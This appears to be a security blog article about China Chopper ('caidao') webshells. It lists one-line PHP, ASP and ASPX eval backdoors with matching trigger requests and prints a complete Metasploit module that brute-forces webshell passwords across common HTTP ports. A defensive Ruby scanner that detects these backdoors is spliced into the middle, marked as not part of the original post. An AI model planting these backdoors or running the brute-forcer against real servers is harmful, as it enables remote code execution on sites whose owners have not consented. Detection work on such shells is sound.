This article introduces Metasploit - crack chinese caidao php backdoor.
Backdoor Request
PHP Backdoor: <?php @eval($_POST["OP"]);?>
HTTP Request: POST /bk.php .... op=phpinfo();
If it's successful, the phpinfo page will be shown.

ASP Backdoor: <%eval request("op")%>
HTTP Request: POST /bk.asp op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.end")
If it's successful, a 'woo5woo' page will be shown.

ASPX Backdoor: <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>
HTTP Request: POST /bk.aspx op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")
If it's successful, a 'woo5woo' page will be shown.
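An added example, not part of the original post: a Ruby scanner that flags the three one-line eval backdoors listed above in a web root and reports the request parameter that acts as the password. The regexes generalize slightly beyond the page's snippets (whitespace, `$_GET`/`$_REQUEST`, ASP `execute`); the names `SIGNATURES`, `scan_source`, `scan_tree`, `scan_samples` and the sample file contents are constructed for illustration.

```ruby
# Added example: static detection of the one-line eval backdoors shown above.
# Capture group 1 is the request parameter name, i.e. the backdoor "password".
SIGNATURES = {
  php:  /\beval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[\s*["']([^"']+)["']\s*\]\s*\)/i,
  asp:  /\b(?:eval|execute)\s*\(?\s*request\s*\(\s*"([^"]+)"\s*\)/i,
  aspx: /\beval\s*\(\s*Request\.Item\s*\[\s*"([^"]+)"\s*\]\s*,\s*"unsafe"\s*\)/i
}.freeze

Finding = Struct.new(:path, :type, :param, :line)

# Scan one file's text; returns a Finding per matching line and signature.
def scan_source(path, source)
  findings = []
  source.each_line.with_index(1) do |text, number|
    SIGNATURES.each do |type, pattern|
      match = pattern.match(text)
      findings << Finding.new(path, type, match[1], number) if match
    end
  end
  findings
end

# Walk a web root and scan every script the web server would execute.
def scan_tree(root)
  Dir.glob(File.join(root, "**", "*.{php,asp,aspx}")).flat_map do |path|
    scan_source(path, File.binread(path))
  end
end

# Constructed sample files: the page's three backdoors plus a benign script.
SAMPLES = {
  "bk.php"   => '<?php @eval($_POST["OP"]);?>',
  "bk.asp"   => '<%eval request("op")%>',
  "bk.aspx"  => '<%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>',
  "form.php" => "<?php\necho htmlspecialchars($_POST[\"name\"]);\n?>"
}.freeze

# Run the signatures over the constructed samples.
def scan_samples
  SAMPLES.flat_map { |path, source| scan_source(path, source) }
end

if __FILE__ == $PROGRAM_NAME
  scan_samples.each do |f|
    puts "#{f.path}:#{f.line} #{f.type} eval backdoor, parameter=#{f.param}"
  end
end
```

On a real host, call `scan_tree` with the web root path; any hit names the file, the line and the parameter to look for in request logs.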
Crack a php backdoor
For example, we will crack a caidao PHP backdoor step by step.
1. We create an HTML login form to learn how to use the PHP backdoor.
Press the label called "Click Here", and we will see the HTTP request in Burp Suite.
Bingo! The password is 'adminadmin'. Now we can do it with Metasploit as follows.
Crack backdoors with metasploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Chinese Caidao Backdoor Bruteforce',
      'Description' => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
      'Author'      => [ 'Nixawk' ],
      'References'  => [
        [ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329' ]
      ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
        OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ]),
        OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
      ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  # The candidate password is sent as the POST parameter name; the response
  # body is then checked for the expected marker string.
  def backdoor_brute(uri, user, pass, payload, match)
    begin
      data = "&user=#{user}&#{pass}=#{payload}"
      res = send_request_cgi({
        'uri'    => uri,
        'method' => "POST",
        'data'   => "#{data}"
      })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT
      print_error("#{peer} - Service failed to respond")
      return :abort
    end

    print_status("#{peer} - brute force caidao password: \"#{pass}\"")

    if res and res.code == 200 and res.body =~ /#{match}/mi
      print_good("#{peer} - Successful login: password - \"#{pass}\"")
      return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    # Random marker, so a match in the response comes from evaluated code.
    junk = Rex::Text::rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";
    when /asp$/mi
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"
    when /aspx$/mi
      payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\"));Response.Write(\"#{junk}\")"
    else
      print_error("#{peer} - Backdoor type is not supported")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end